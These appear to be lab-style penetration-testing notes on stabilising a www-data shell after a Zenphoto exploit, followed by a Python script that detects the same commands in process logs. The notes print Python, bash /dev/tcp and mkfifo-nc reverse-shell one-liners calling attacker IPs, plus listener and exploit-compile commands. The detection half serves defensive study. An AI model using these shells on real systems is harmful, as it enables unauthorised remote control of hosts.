Zenphoto - exploit db - nc trick for stable shell

Stable Shell

We now have a shell on the target machine and we are running as the user www-data. I found that with this shell, changing directories or running scripts would produce unexpected behaviour.

I performed a quick check to see if Python was installed using which python. After confirming Python was installed, I tried a quick one-liner reverse shell to see if I could get a more stable one.

First I started a netcat listener on my attacking machine:

sudo nc -lvp 443

Then run the following command on the target machine:

python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.221",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

bash -c 'bash -i >& /dev/tcp/192.168.45.231/4444 0>&1'

gcc 15285.c -o 15285 -std=gnu89 -w

#cool.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.202 4444 >/tmp/f
chmod +x /tmp/nc
#start nc listener at kali
nc -nlvp 4444
#go back james execute nc
bash -i >& /dev/tcp/$kaliIP/4444 0>&1
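
Seen from the defending side, the three shell one-liners above leave recognisable command lines in process-execution telemetry. The following is an added example, not part of the original notes: it flags them in constructed log records. The tab-separated user/parent/command format, the WEB_USERS set, the "deploy" account and the benign sample entries are assumptions.

```python
import re

# Signatures for the three one-liners on this page (interpreter -c with
# socket+dup2+pty, bash /dev/tcp redirection, mkfifo piped through nc).
SIGNATURES = {
    "python-pty-socket": re.compile(
        r"python[\d.]*\s+-c\b(?=.*socket\.socket)(?=.*os\.dup2)(?=.*pty\.spawn)"),
    "bash-dev-tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "mkfifo-nc-pipe": re.compile(
        r"mkfifo\s+([^\s;|&]+).*\|\s*(?:\S*/)?(?:sh|bash)\s+-i\b"
        r".*\|\s*(?:\S*/)?(?:ncat|netcat|nc)\b.*>\s*\1"),
}
# Assumption: service accounts that should never start an interactive shell.
WEB_USERS = {"www-data", "apache", "nginx"}

def classify(cmdline):
    """Return the names of all signatures matching one command line."""
    return sorted(n for n, rx in SIGNATURES.items() if rx.search(cmdline))

def scan(lines):
    """Parse 'user<TAB>parent<TAB>cmdline' records (assumed format)."""
    alerts = []
    for line in lines:
        parts = line.rstrip("\n").split("\t", 2)
        if len(parts) != 3:
            continue  # skip malformed records instead of crashing
        user, parent, cmdline = parts
        hits = classify(cmdline)
        if hits:
            # A web service account spawning a network-attached shell is
            # the situation this page describes, so rank it highest.
            severity = "high" if user in WEB_USERS else "medium"
            alerts.append((user, parent, severity, hits))
    return alerts

# Constructed sample telemetry; the first three commands are from this page.
SAMPLE = """\
www-data\tapache2\tpython -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.221",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
www-data\tsh\tbash -c 'bash -i >& /dev/tcp/192.168.45.231/4444 0>&1'
deploy\tbash\trm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.202 4444 >/tmp/f
www-data\tapache2\tpython -c 'print(1)'
root\tsshd\tnc -zv 10.0.0.5 22
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE.splitlines()):
        print(alert)
```

The signatures match on command-line text only, so they suit auditd execve records or EDR process events where the full argument string is captured.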